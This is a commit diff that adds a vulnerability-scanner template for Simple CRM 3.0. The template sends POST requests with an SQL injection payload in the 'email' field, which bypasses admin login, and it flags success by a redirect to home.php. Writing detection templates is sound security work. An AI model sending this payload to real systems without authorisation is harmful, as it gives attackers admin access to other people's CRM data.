Create simple-crm-sql-injection.yaml

vulnerabilities/simplecrm/simple-crm-sql-injection.yaml

@@ -0,0 +1,33 @@
+id: simple-crm-sql-injection
+
+info:
+  name: Simple CRM 3.0 - 'email' SQL injection & Authentication Bypass 
+  reference: https://packetstormsecurity.com/files/163254/simplecrm30-sql.txt
+  author: geeknik   
+  severity: critical
+  tags: sqli,bypass,simplecrm
+
+requests:
+  - method: POST
+    path:
+      - "{{BaseURL}}/scrm/crm/admin"
+    body: "email='+or+2>1+--+&password=&login="
+
+  - method: POST
+    path:
+      - "{{BaseURL}}/crm/admin"
+    body: "email='+or+2>1+--+&password=&login="
+
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+      - type: word
+        words:
+          - "<script>window.location.href='home.php'</script>"
+        part: body
+      - type: word
+        words:
+          - "text/html" 
+        part: header